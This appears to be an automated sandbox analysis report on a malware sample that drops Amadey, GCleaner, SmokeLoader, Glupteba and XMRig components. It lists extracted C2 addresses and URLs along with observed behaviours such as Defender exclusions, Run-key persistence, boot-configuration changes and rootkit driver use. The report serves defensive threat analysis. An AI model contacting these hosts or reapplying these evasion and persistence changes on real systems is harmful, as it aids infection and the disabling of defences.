amadey | c5ed5ae369da1d7784e5750e5da0ff898b438b79a7875590cad8bdd6af3e99f4

Analysis

max time kernel
144s
max time network
154s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
12-06-2023 12:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

4.5MB
MD5

1e5b2635145a5aff691b63b8ad16a4df
SHA1

ba01612a8df2e4d8f2859089fba64c00c3eaf43c
SHA256

c5ed5ae369da1d7784e5750e5da0ff898b438b79a7875590cad8bdd6af3e99f4
SHA512

001055e2e205cf9e543aa4811673a8860e2d60165426bb64300cb01d83b53a0a2efcc3a72f02911af36aca2a0b547ec7ee2da6825635fc9356734c09c06339b9
SSDEEP

98304:Kok7uaLci46qFDcaTF88bIULQaEe5vQe5:YdLci46qFYG2uEzqJ

Score

10^/10

amadey gcleaner glupteba smokeloader xmrig up3 backdoor discovery dropper evasion loader miner persistence rootkit trojan upx

Malware Config

Extracted

Family

amadey

Version

3.83

5.42.65.80/8bmeVwqx/index.php

Extracted

Family

gcleaner

45.12.253.56

45.12.253.72

45.12.253.98

45.12.253.75

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 14 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1108-123-0x0000000003D20000-0x000000000460B000-memory.dmp	family_glupteba
behavioral1/memory/1108-152-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba
behavioral1/memory/1036-166-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba
behavioral1/memory/2024-213-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba
behavioral1/memory/2024-237-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba
behavioral1/memory/2024-294-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba
behavioral1/memory/2024-297-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba
behavioral1/memory/2024-299-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba
behavioral1/memory/2024-301-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba
behavioral1/memory/2024-311-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba
behavioral1/memory/2024-322-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba
behavioral1/memory/2024-326-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba
behavioral1/memory/2024-331-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba
behavioral1/memory/2024-334-0x0000000000400000-0x0000000001EB5000-memory.dmp	family_glupteba

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

Processes:

XandETC.exeupdater.execonhost.exe

description	pid	process	target process
PID 1500 created 1208	1500	XandETC.exe	Explorer.EXE
PID 1500 created 1208	1500	XandETC.exe	Explorer.EXE
PID 1500 created 1208	1500	XandETC.exe	Explorer.EXE
PID 1500 created 1208	1500	XandETC.exe	Explorer.EXE
PID 1500 created 1208	1500	XandETC.exe	Explorer.EXE
PID 1908 created 1208	1908	updater.exe	Explorer.EXE
PID 1908 created 1208	1908	updater.exe	Explorer.EXE
PID 1908 created 1208	1908	updater.exe	Explorer.EXE
PID 1908 created 1208	1908	updater.exe	Explorer.EXE
PID 1908 created 1208	1908	updater.exe	Explorer.EXE
PID 1688 created 1208	1688	conhost.exe	Explorer.EXE
PID 1908 created 1208	1908	updater.exe	Explorer.EXE

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

3eef203fb515bda85f514e168abb5973.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0"	3eef203fb515bda85f514e168abb5973.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
1032	bcdedit.exe
564	bcdedit.exe
776	bcdedit.exe
1608	bcdedit.exe
1984	bcdedit.exe
1428	bcdedit.exe
1284	bcdedit.exe
1976	bcdedit.exe
1064	bcdedit.exe
1352	bcdedit.exe
888	bcdedit.exe
1980	bcdedit.exe
1032	bcdedit.exe
1360	bcdedit.exe

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/300-317-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/300-324-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/300-325-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/300-328-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/300-333-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/300-336-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

csrss.exe

description ioc process

File created C:\Windows\system32\drivers\Winmon.sys csrss.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

1968 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

pid	process
1968	netsh.exe

Executes dropped EXE 16 IoCs

Processes:

aafg31.exeoldplayer.exeXandETC.exeoneetx.exe3eef203fb515bda85f514e168abb5973.exesetup.exetoolspub2.exetoolspub2.exe3eef203fb515bda85f514e168abb5973.execsrss.exepatch.exeinjector.exeupdater.exedsefix.exeoneetx.exeoneetx.exe

pid	process
1976	aafg31.exe
664	oldplayer.exe
1500	XandETC.exe
1372	oneetx.exe
1108	3eef203fb515bda85f514e168abb5973.exe
1860	setup.exe
1668	toolspub2.exe
1948	toolspub2.exe
1036	3eef203fb515bda85f514e168abb5973.exe
2024	csrss.exe
1764	patch.exe
1556	injector.exe
1908	updater.exe
1240	dsefix.exe
1844	oneetx.exe
848	oneetx.exe

Loads dropped DLL 28 IoCs

Processes:

tmp.exeoldplayer.exeoneetx.exesetup.exetoolspub2.exe3eef203fb515bda85f514e168abb5973.exepatch.execsrss.exetaskeng.exe

pid	process
1972	tmp.exe
1972	tmp.exe
1972	tmp.exe
1972	tmp.exe
664	oldplayer.exe
1372	oneetx.exe
1372	oneetx.exe
1372	oneetx.exe
1860	setup.exe
1860	setup.exe
1860	setup.exe
1372	oneetx.exe
1372	oneetx.exe
1668	toolspub2.exe
1036	3eef203fb515bda85f514e168abb5973.exe
1036	3eef203fb515bda85f514e168abb5973.exe
860
1764	patch.exe
1764	patch.exe
1764	patch.exe
1764	patch.exe
1764	patch.exe
2024	csrss.exe
1764	patch.exe
1764	patch.exe
1764	patch.exe
1364	taskeng.exe
2024	csrss.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/300-317-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/300-324-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/300-325-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/300-328-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/300-333-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/300-336-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

3eef203fb515bda85f514e168abb5973.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	3eef203fb515bda85f514e168abb5973.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

3eef203fb515bda85f514e168abb5973.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMon csrss.exe
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

description	ioc	process
File opened for modification	\??\WinMon	csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

toolspub2.exeupdater.exe

description	pid	process	target process
PID 1668 set thread context of 1948	1668	toolspub2.exe	toolspub2.exe
PID 1908 set thread context of 1688	1908	updater.exe	conhost.exe
PID 1908 set thread context of 300	1908	updater.exe	conhost.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

3eef203fb515bda85f514e168abb5973.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN 3eef203fb515bda85f514e168abb5973.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	3eef203fb515bda85f514e168abb5973.exe

Drops file in Program Files directory 4 IoCs

Processes:

updater.execmd.execmd.exeXandETC.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Notepad\Chrome\updater.exe	XandETC.exe

Drops file in Windows directory 3 IoCs

Processes:

3eef203fb515bda85f514e168abb5973.exemakecab.exe

description	ioc	process
File opened for modification	C:\Windows\rss	3eef203fb515bda85f514e168abb5973.exe
File created	C:\Windows\rss\csrss.exe	3eef203fb515bda85f514e168abb5973.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20230612121120.cab	makecab.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1668 sc.exe
1928 sc.exe
1200 sc.exe
964 sc.exe
692 sc.exe
768 sc.exe
300 sc.exe
824 sc.exe
1280 sc.exe
1056 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1668	sc.exe
1928	sc.exe
1200	sc.exe
964	sc.exe
692	sc.exe
768	sc.exe
300	sc.exe
824	sc.exe
1280	sc.exe
1056	sc.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1616 schtasks.exe
1232 schtasks.exe
664 schtasks.exe
1868 schtasks.exe
1396 schtasks.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

1500 WMIC.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1736 taskkill.exe

pid	process
1616	schtasks.exe
1232	schtasks.exe
664	schtasks.exe
1868	schtasks.exe
1396	schtasks.exe

pid	process
1500	WMIC.exe

pid	process
1736	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

3eef203fb515bda85f514e168abb5973.exenetsh.execonhost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	conhost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	3eef203fb515bda85f514e168abb5973.exe
